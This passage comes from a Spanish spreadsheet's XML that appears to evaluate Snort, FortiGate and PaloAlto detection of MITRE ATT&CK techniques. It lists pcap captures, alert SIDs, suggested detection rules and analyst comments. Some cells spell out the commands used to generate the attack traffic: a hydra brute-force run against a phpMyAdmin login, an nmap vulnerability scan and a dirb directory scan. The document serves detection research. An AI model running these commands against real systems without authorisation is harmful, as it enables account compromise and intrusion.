      <t>FortiGate detecta el uso de comandos de forma remota, pero no detecta el uso de SSH como túnel para el envío de comandos. Por tanto, esto se considera una detección de ataque colateral satisfactoria, pero no así para el ataque principal</t>
    </r>
  </si>
  <si>
    <t>psexec -- remote-acess</t>
  </si>
  <si>
    <t>Además de la alerta generada mediante IPS del intento de login SSH, se detecta un acceso remoto mediante control de aplicaciones</t>
  </si>
  <si>
    <t>Encrypted Channel</t>
  </si>
  <si>
    <t>T1573</t>
  </si>
  <si>
    <t>Asymetric Cryptography</t>
  </si>
  <si>
    <t>T1573.002</t>
  </si>
  <si>
    <t>Encriptar conexion con C2 Server</t>
  </si>
  <si>
    <t>Metasploit, OpenSSL</t>
  </si>
  <si>
    <t>T1573.002-AsymetricCryptography_[5].pcapng</t>
  </si>
  <si>
    <t>SSL</t>
  </si>
  <si>
    <t>Deteccion por anomalías, monitorizando la creacion de nuevas conexiones</t>
  </si>
  <si>
    <t>Encriptar conexion al C2 Server</t>
  </si>
  <si>
    <t>Manual [5] / 4.8.7</t>
  </si>
  <si>
    <t>Manual [5] / C.18</t>
  </si>
  <si>
    <t>Manual [5] /  5.11.13</t>
  </si>
  <si>
    <t>Encriptar un canal no necesariamente es un ataque.  Un administrador de red puede utilizar SSH por ejemplo para acceder a otro equipo y es lo mismo que un atacante realizaría</t>
  </si>
  <si>
    <t>Resource Development</t>
  </si>
  <si>
    <t>TA0042</t>
  </si>
  <si>
    <t>Compromise Infrastructure</t>
  </si>
  <si>
    <t>T1584</t>
  </si>
  <si>
    <t>DNS Server</t>
  </si>
  <si>
    <t>T1584.002</t>
  </si>
  <si>
    <t>Envenenamiento de Caché DNS</t>
  </si>
  <si>
    <t>T1584-Cache_dns_[1].pcapng</t>
  </si>
  <si>
    <t>Una vez el servidor DNS se encuentra comprometido, no es posible determinar si las redirecciones basadas en una caché envenenada son maliciosas o no</t>
  </si>
  <si>
    <t>Manual [1] /  2.4.1.1.5</t>
  </si>
  <si>
    <t>Manual [1] / E.16</t>
  </si>
  <si>
    <t>Manual [5] / 5.2.3.1</t>
  </si>
  <si>
    <t>El envenenamiento de la cache DNS siempre es un ataque</t>
  </si>
  <si>
    <t>29456, 384</t>
  </si>
  <si>
    <t>29456, 384, 13249</t>
  </si>
  <si>
    <t>29456, 384, 13249, 2100469, 2100384, 2002752, 2002749</t>
  </si>
  <si>
    <t>2100384, 2100469, 2002752, 2002749</t>
  </si>
  <si>
    <t>29456, 284, 13249</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: la herramienta tranalyzer considera los dos mensajes ICMP como pertenecientes al mismo flujo pero Snortv3 detecta ambos como flujos distintos. Al mismo tiempo Snortv2 no los analiza. Adicionalmente ni Snortv3 ni Snortv2 tienen en cuenta los dos flujos hpext que tranalyzer sí considera. En balance, Snortv3 detecta 1 flujo menos y Snortv2 3 menos. Ninguno de estos flujos es relevante.</t>
    </r>
  </si>
  <si>
    <t>Secuestro / Redireccionamiento DNS</t>
  </si>
  <si>
    <t>T1584-Secuestro_dns_[1].pcapng</t>
  </si>
  <si>
    <t>Manual [1] /  2.4.1.1.4</t>
  </si>
  <si>
    <t>Manual [1] / E.15</t>
  </si>
  <si>
    <t>El secuestro DNS siempre es un ataque</t>
  </si>
  <si>
    <t>2100469, 2100384, 2002752, 2002749</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Contaje Mensajes</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">: el CSV de alertas identifica dos paquetes distintos con el mismo IDPaq (porque el contenido de los paquetes es idéntico), causando que el cálculo devuelva menos mensajes que flujos. Se ha arreglado esta errata de forma manual (RS3: 1 mensaje → 2 mensajes // RS4: 2 mensajes → 3 mensajes)                                                              </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: Snortv3 desagrupa los dos paquetes ICMP en dos flujos, mientras que tranalyzer los considera uno sólo. Snortv2 no los analiza.</t>
    </r>
  </si>
  <si>
    <t>Botnet</t>
  </si>
  <si>
    <t>T1584.005</t>
  </si>
  <si>
    <t xml:space="preserve">Uso de Botnet </t>
  </si>
  <si>
    <t>T1584.005-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>La detección debe centrarse en otras fases del ciclo de vida de un ataque, como Phishing, DDoS...</t>
  </si>
  <si>
    <t>Uso de Ares y screenshots y key logging    https://www.unb.ca/cic/datasets/ids-2018.html</t>
  </si>
  <si>
    <t>El uso de Botnet siempre es un atauqe</t>
  </si>
  <si>
    <t>1413, 1417, 254, 1448, 1917, 2049, 29456, 31136, 384, 385, 42340, 449, 566</t>
  </si>
  <si>
    <t>1448, 254, 1917, 29456, 384, 408, 449, 1413, 1417, 385, 2049, 566, 31136, 2001330, 2013479, 2001972, 2102465, 2102466, 2011716, 2008578, 2012709, 2027390, 2025275, 2027413, 2017515, 2015856, 2101413, 2010937, 2100566, 2010935, 2003068, 2001219, 2012296, 2010939</t>
  </si>
  <si>
    <t>2003068, 2001219, 2010937, 2010935, 2101413</t>
  </si>
  <si>
    <t>1448, 254, 1917, 29456, 384, 408, 449, 1413, 1417, 385, 2049, 566, 31136, 2001330, 2013479, 2001972, 2102465, 2102466, 2011716, 2008578, 2012709, 2027390, 2025275, 2027413, 2017515, 2015856, 2100566, 2012296, 2010939</t>
  </si>
  <si>
    <t>2001330, 2013479, 2001972, 2102465, 2102466, 2011716, 2008578, 2012709, 2027390, 2025275, 2027413, 2017515, 2015856, 2101413, 2010937, 2100566, 2010935, 2003068, 2001219, 2012296, 2010939, 1448, 254, 57756, 44487, 44485, 44489, 44486, 44484, 44488, 1917, 28993, 29456, 384, 408, 32481, 41379, 29957, 44416, 449, 4060, 36376, 40186, 52625, 45941, 25664, 41742, 50447, 1413, 1417, 385, 2049, 566, 15850, 31136, 23493</t>
  </si>
  <si>
    <t>2001330, 2013479, 2001972, 2102465, 2102466, 2011716, 2008578, 2012709, 2027390, 2025275, 2027413, 2017515, 2015856, 2100566, 2012296, 2010939, 1448, 254, 57756, 44487, 44485, 44489, 44486, 44484, 44488, 1917, 28993, 29456, 384, 408, 32481, 41379, 29957, 44416, 449, 4060, 36376, 40186, 52625, 45941, 25664, 41742, 50447, 1413, 1417, 385, 2049, 566, 15850, 31136, 23493</t>
  </si>
  <si>
    <t>2001219, 2003068, 2010935, 2010937</t>
  </si>
  <si>
    <t xml:space="preserve">1448, 254, 57756, 44487, 44485, 44489, 44486, 44484, 44488, 1917, 28993, 29456, 384, 408, 32481, 41379, 29957, 44416, 449, 4060, 36376, 40186, 52625, 45941, 25664, 41742, 50447, 1413, 1417, 385, 2049, 566, 15850, 31136, 23493, 2002749, 2002752, 2101448, 2101447, 2001329, 2001330, 2003020, 2009582, 2100254, 2003012, 2003006, 2013479, 2001972, 2044666, 2023997, 2102465, 2102466, 2101917, 2100486, 2022218, 2014384, 2001117, 2011716, 2008578, 2100384, 2100408, 2027759, 2102925, 2100449, 2100615, 2012709, 2034857, 2009207, 2027390, 2025275, 2009206, 2009205, 2009208, 2027413, 2100469, 2043304, 2017515, 2015856, 2101413, 2101417, 2100385, 2102049, 2010937, 2100566, 2010935, 2003068, 2001219, 2012296, 2003099, 2010939
</t>
  </si>
  <si>
    <t>2002749, 2002752, 2009582, 2001117, 2009207, 2009206, 2009205, 2009208, 2100469, 2100615, 2100384, 2100408, 2100385, 2101417, 2101917, 2010937, 2010935, 2003068, 2001219, 2101413</t>
  </si>
  <si>
    <t xml:space="preserve">1448, 254, 57756, 44487, 44485, 44489, 44486, 44484, 44488, 1917, 28993, 29456, 384, 408, 32481, 41379, 29957, 44416, 449, 4060, 36376, 40186, 52625, 45941, 25664, 41742, 50447, 1413, 1417, 385, 2049, 566, 15850, 31136, 23493, 2101448, 2101447, 2001329, 2001330, 2003020, 2100254, 2003012, 2003006, 2013479, 2001972, 2044666, 2023997, 2102465, 2102466, 2100486, 2022218, 2014384, 2011716, 2008578, 2027759, 2102925, 2100449, 2012709, 2034857, 2027390, 2025275, 2027413, 2043304, 2017515, 2015856, 2102049, 2100566, 2012296, 2003099, 2010939
</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Mensajes e Instancias con Ataque</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">: Los numeros de mensajes e instancias con ataque de la captura resulta dificil de detectar debido a que es un ataque realizado por CIC. Por la naturaleza del ataque y el uso de tráfico cifrado resulta imposible determinar estos valores con certeza. Por defecto los dejamos a 1.                                                                                                                                                                     </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">: por lo comentado en el punto anterior, tampoco resulta viable proporcionar una explicación fiable acerca de la diferencia en los flujos detectados por ambas versiones de Snort y tranalyzer.                                                                                             </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Análisis Manual</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: este ataque, debido al gran número de alertas generadas y al tamaño del fichero no ha podido analizarse manualmente. Los resultados automáticos contarán pero no se contabilizarán los SIDs para las tablas de análisis</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">vimeo-base -- photo video / ms-rdp -- remote access / </t>
  </si>
  <si>
    <t>9999, 14984, 14978,</t>
  </si>
  <si>
    <t>14984, 14978,</t>
  </si>
  <si>
    <t>PaloAlto detecta el uso de una aplicación relacionada con fotos y videos (en el ataque se realizan Screenshots) y el acceso remoto mediante RDP.</t>
  </si>
  <si>
    <t>Establish Accounts</t>
  </si>
  <si>
    <t>T1585</t>
  </si>
  <si>
    <t>Social Media Accounts</t>
  </si>
  <si>
    <t>T1585.001</t>
  </si>
  <si>
    <t>Creación de cuentas de redes sociales</t>
  </si>
  <si>
    <t>Sitios web convencionales (Facebook, Github, Microsoft ...)</t>
  </si>
  <si>
    <t>T1585.001-Establish_social_accounts_[4].pcapng</t>
  </si>
  <si>
    <t>Siempre y cuando el origen sea la red a proteger, detección por anomalías que identifique un incipiente aumento de las peticiones a servidores de redes sociales.</t>
  </si>
  <si>
    <t>Manual [4] /  3.2</t>
  </si>
  <si>
    <t>Manual [4] / B.2</t>
  </si>
  <si>
    <t>Manual [4] / 4.2</t>
  </si>
  <si>
    <t>La creación de cuentas de redes sociales es una acción totalmente legítima en ciertos contextos</t>
  </si>
  <si>
    <t>93031, 9999</t>
  </si>
  <si>
    <t>Compromise Accounts</t>
  </si>
  <si>
    <t>T1586</t>
  </si>
  <si>
    <t>T1586.001</t>
  </si>
  <si>
    <t>Fuerza bruta para acceso a web</t>
  </si>
  <si>
    <t>T1586.001-Compromise_Accounts_[2].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte un ataque de fuerza bruta en base al envío masivo de peticiones de acceso a una página web</t>
  </si>
  <si>
    <t>Ataque de fuerza bruta a formulario de acceso a página web phpMyAdmin. Comando: hydra -l root -P /usr/share/john/password.lst 192.168.2.2 http-post-form "/phpmyadmin/index.php:pma_username=^USER^&amp;pma_password=^PASS^:#1045 Cannot log in to the MySQL server"</t>
  </si>
  <si>
    <t>Manual [2] / 3.1.2.1</t>
  </si>
  <si>
    <t>Manual [5] / C.36</t>
  </si>
  <si>
    <t>Manual [2] / 4.2.1.3</t>
  </si>
  <si>
    <t>El uso de la fuerza bruta para acceder a una página web siempre es un ataque</t>
  </si>
  <si>
    <t>1434, 1433, 1201, 1129, 1071, 2062, 43285, 1288, 940, 937, 1662, 1489, 1145, 1301, 879, 1218, 845, 1213, 885, 1206, 882, 1231, 1543, 1551, 839, 825, 1016, 1141, 1606, 993, 886, 1877, 895, 1852, 1520, 1521, 835, 849, 896, 1826, 853, 43290, 887, 1025</t>
  </si>
  <si>
    <t>1434, 1433, 1201, 1129, 1071, 2062, 43285, 1288, 940, 937, 1662, 1489, 1145, 1301, 879, 1218, 845, 1213, 885, 1206, 882, 1231, 1543, 1551, 839, 825, 1016, 1141, 1606, 993, 886, 1877, 895, 1852, 1520, 1521, 835, 849, 896, 1826, 853, 43290, 887, 1025, 2049402, 2027261, 2022520, 2101201, 2101129, 2101071, 2027250, 2101145, 2018413, 2010229, 2101016, 2100993, 2019526, 2101877, 2027263</t>
  </si>
  <si>
    <t>50447, 1434, 1433, 1201, 1129, 1071, 2062, 43285, 1288, 41742, 940, 937, 33608, 1662, 1489, 1145, 1301, 879, 1218, 845, 1213, 885, 1206, 882, 1231, 1543, 1551, 839, 825, 1016, 1141, 1606, 993, 886, 42289, 59258, 1877, 895, 1852, 1520, 1521, 835, 849, 896, 1826, 853, 43290, 887, 1025, 2049402, 2027261, 2022520, 2101201, 2101129, 2101071, 2027250, 2101145, 2018413, 2010229, 2101016, 2100993, 2019526, 2101877, 2027263</t>
  </si>
  <si>
    <t>50447, 1434, 1433, 1201, 1129, 1071, 2062, 43285, 1288, 41742, 940, 937, 33608, 1662, 1489, 1145, 1301, 879, 1218, 845, 1213, 885, 1206, 882, 1231, 1543, 1551, 839, 825, 1016, 1141, 1606, 993, 886, 42289, 59258, 1877, 895, 1852, 1520, 1521, 835, 849, 896, 1826, 853, 43290, 887, 1025, 2002752, 2002749, 2010706, 2049402, 2027261, 2022520, 2101201, 2101129, 2101071, 2009885, 2027250, 2101288, 2100937, 2101662, 2101489, 2101145, 2018413, 2010229, 2008330, 2000560, 2100884, 2101016, 2100993, 2010377, 2019526, 2101877, 2101852, 2027263, 2101620, 2009749</t>
  </si>
  <si>
    <t>50447, 1434, 1433, 1201, 1129, 1071, 2062, 43285, 1288, 41742, 940, 937, 33608, 1662, 1489, 1145, 1301, 879, 1218, 845, 1213, 885, 1206, 882, 1231, 1543, 1551, 839, 825, 1016, 1141, 1606, 993, 886, 42289, 59258, 1877, 895, 1852, 1520, 1521, 835, 849, 896, 1826, 853, 43290, 887, 1025, 2010706, 2049402, 2027261, 2022520, 2101201, 2101129, 2101071, 2009885, 2027250, 2101288, 2100937, 2101662, 2101489, 2101145, 2018413, 2010229, 2008330, 2000560, 2100884, 2101016, 2100993, 2010377, 2019526, 2101877, 2101852, 2027263, 2101620, 2009749</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">: Snortv2 no analiza el flujo ICMPv6 de la captura. Este flujo no es relevante para el ataque, por lo que no afecta a los resultados finales.                                                     </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Análisis Manual</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: este ataque, debido al gran número de alertas generadas y al tamaño del fichero no ha podido analizarse manualmente. Los resultados automáticos contarán pero no se contabilizarán los SIDs para las tablas de análisis</t>
    </r>
  </si>
  <si>
    <t>12648, 29263, 12475, 29264, 13900, 29261</t>
  </si>
  <si>
    <t>PaloAlto detecta las URL como amenazas individuales. Al existir tal cantidad de alertas, se puede deducir que existe un ataque de este tipo. Sin embargo, no existe una alerta que detecte un ataque DDoS así como tal.</t>
  </si>
  <si>
    <t>Reconnaissance</t>
  </si>
  <si>
    <t>TA0043</t>
  </si>
  <si>
    <t>Gather Victim Identity Information</t>
  </si>
  <si>
    <t>T1589</t>
  </si>
  <si>
    <t>Email Addresses</t>
  </si>
  <si>
    <t>T1589.002</t>
  </si>
  <si>
    <t>Recogida de cuentas de correo eléctronico y validación de las mismas</t>
  </si>
  <si>
    <t>theHarvester, bulk-email-verifier</t>
  </si>
  <si>
    <t>T1589.002-Gather_victim_identity_information_[4].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte un número elevado de intentos de conexión y mensajes ehlo SMTP procedentes de un mismo origen hacia un servidor, con diferentes destinatarios.</t>
  </si>
  <si>
    <t>Manual [4] / 3.1</t>
  </si>
  <si>
    <t>Manual [4] / B.1</t>
  </si>
  <si>
    <t>Manual [4] / 4.1</t>
  </si>
  <si>
    <t>La recogida de cuentas de correo electrónico así como la comprobación de su validez puede considerarse como acción legítima en algunos contextos</t>
  </si>
  <si>
    <t>smtp-base -- email (risk of app = 5)</t>
  </si>
  <si>
    <t>Active Scanning</t>
  </si>
  <si>
    <t>T1595</t>
  </si>
  <si>
    <t>Vulnerability Scanning</t>
  </si>
  <si>
    <t>T1595.002</t>
  </si>
  <si>
    <t>Escaneo de vulnerabilidades</t>
  </si>
  <si>
    <t>T1595.002-Port_Scanning_[3].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte el envío de paquetes TCP con flag SYN activado a varios puertos diferentes, sin respuesta del atacante a los ACK posteriores.</t>
  </si>
  <si>
    <t>Ejecución de comando nmap para escaneo de puertos y detección de vulnerabilidades (nmap -sV --script vulscan IP)</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.2</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.2.4 y Manual [5] / C.37</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.2.5</t>
  </si>
  <si>
    <t>Un escaneo exhaustivo de puertos constituye un ataque</t>
  </si>
  <si>
    <t>2010937, 2002911, 2010939, 2010935, 2002910, 1421, 2010936, 1418, 2023753, 2018317, 2034718, 2013409, 2034730, 2009358, 2024364</t>
  </si>
  <si>
    <t>2010937, 2002911, 2010935, 2002910</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010939</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 1421, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010936</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 1418, 2023753, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2018317</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2034718, 2013409, 2034730, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2009358</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2024364</t>
    </r>
  </si>
  <si>
    <t>2013409, 2034730, 2034718</t>
  </si>
  <si>
    <t>2010939, 1421, 2010936, 1418, 2018317, 2009358, 2024364, 2023753</t>
  </si>
  <si>
    <t>1421, 1418, 44484, 44487, 44485, 44489, 41807, 49040, 50447, 2010937, 2002911, 2010939, 2010935, 2002910, 2010936, 2023753, 2018317, 2034718, 2013409, 2034730, 2009358, 2024364</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">1421, 1418, 44484, 44487, 44485, 44489, 41807, 50447, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010939</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010936</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2023753, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2018317</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2034718, 2013409, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2034730</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2009358, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2024364</t>
    </r>
  </si>
  <si>
    <t>49040, 2013409, 2034730, 2034718, 44484, 44485, 44487, 44489, 50447, 41807, 1418, 1421</t>
  </si>
  <si>
    <t>49040, 2013409, 2034730, 2034718</t>
  </si>
  <si>
    <t>44484, 44485, 44487, 44489, 50447, 41807, 1421, 1418</t>
  </si>
  <si>
    <t>2010937, 2002911, 2010939, 2010935, 2002910, 2010936, 2023753, 2018317, 2009358, 2024364</t>
  </si>
  <si>
    <t>2002752, 2002749, 2010937, 2001689, 2002911, 2010939, 2010935, 2002910, 2100472, 2100615, 2010936, 2101418, 2006408, 2044666, 2023753, 2007571, 2003099, 2018317, 2034718, 2013409, 2034730, 2009358, 2024364, 1421, 1418, 44484, 44487, 44485, 44489, 41807, 50447</t>
  </si>
  <si>
    <t>2002752, 2100615, 2010935, 2100472, 2010937, 2002749, 2002910, 2002911</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2001689, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010939, 2010936</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2101418, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2006408</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2044666</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2023753, 2007571, 2003099, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2018317</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2034718, 2013409, 2034730, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2009358</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2024364, 1421, 1418, 44484, 44487, 44485, 44489, 41807, 50447</t>
    </r>
  </si>
  <si>
    <t>49040, 2013409, 2034730, 2034718, 2003099, 2007571, 2100615, 44484, 44485, 44487, 44489, 50447, 2002749, 2002752, 2006408, 2100472, 2101418, 41807</t>
  </si>
  <si>
    <t>49040, 2013409, 2034730, 2034718, 2003099, 2007571, 2100615</t>
  </si>
  <si>
    <t>44484, 44485, 44487, 44489, 50447, 2002749, 2002752, 2006408, 2100472, 2101418, 41807</t>
  </si>
  <si>
    <t>2010937, 2001689, 2002911, 2010939, 2010935, 2002910, 2010936, 2044666, 2023753, 2018317, 2009358, 2024364, 1421, 1418</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Instancias Ataque:</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve"> El ataque consiste en la ejecución de un comando nmap que escanea un rango extenso de puertos comunes. Cada uno de estos descubrimientos es considerado de forma independiente como instancia de ataque.                                                                      </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: Snortv2 no analiza el flujo ICMP, por lo que detecta 1 flujo menos que el total. Este flujo no es relevante, por lo que no hay diferencias en la detección</t>
    </r>
  </si>
  <si>
    <t>43814, 45360</t>
  </si>
  <si>
    <t>portmapper -- infrastructure</t>
  </si>
  <si>
    <t>35364, 9999, 30520, 59582, 94318, 94317, 58433</t>
  </si>
  <si>
    <t>35364, 30520, 59582, 94318, 94317, 58433</t>
  </si>
  <si>
    <t>94318, 94317, 58433</t>
  </si>
  <si>
    <t>35364, 9999, 30520, 59582</t>
  </si>
  <si>
    <t>2033</t>
  </si>
  <si>
    <t>Wordlist Scanning</t>
  </si>
  <si>
    <t>T1595.003</t>
  </si>
  <si>
    <t>Escaneo de página web</t>
  </si>
  <si>
    <t>Dirb</t>
  </si>
  <si>
    <t>T1595.003-Web_page_scanning1_[2].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte peticiones HTTP hacia muchas URLs diferentes con destino el mismo servidor</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">Ejecucion de comando dirb para escaneo de la estructura de directorios (dirb </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color rgb="FF1155CC"/>
        <sz val="11.0"/>
        <u/>
      </rPr>
      <t>http://IP</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> -w /usr/share/dirb/wordlist/vulns/apache.txt)</t>
    </r>
  </si>
  <si>
    <t>Manual [2] /   3.1.1.1</t>
  </si>
  <si>
    <t>Manual [5] / C.38</t>
  </si>
  <si>
    <t>Manual [2] / 4.1.1.1</t>
  </si>
  <si>
    <t>Un escaneo exhaustivo de una página web siempre es un ataque</t>
  </si>
  <si>
    <t>2049402, 2027261, 2022520, 2101201, 2101129, 2101071, 2027250, 2101145, 2018413, 2010229, 2101016, 2100993, 2019526, 2101877, 2027263, 50447, 1434, 1433, 1201, 1129, 1071, 2062, 43285, 1288, 41742, 940, 937, 33608, 1662, 1489, 1145, 1301, 879, 1218, 845, 1213, 885, 1206, 882, 1231, 1543, 1551, 839, 825, 1016, 1141, 1606, 993, 886, 42289, 59258, 1877, 895, 1852, 1520, 1521, 835, 849, 896, 1826, 853, 43290, 887, 1025</t>
  </si>
  <si>
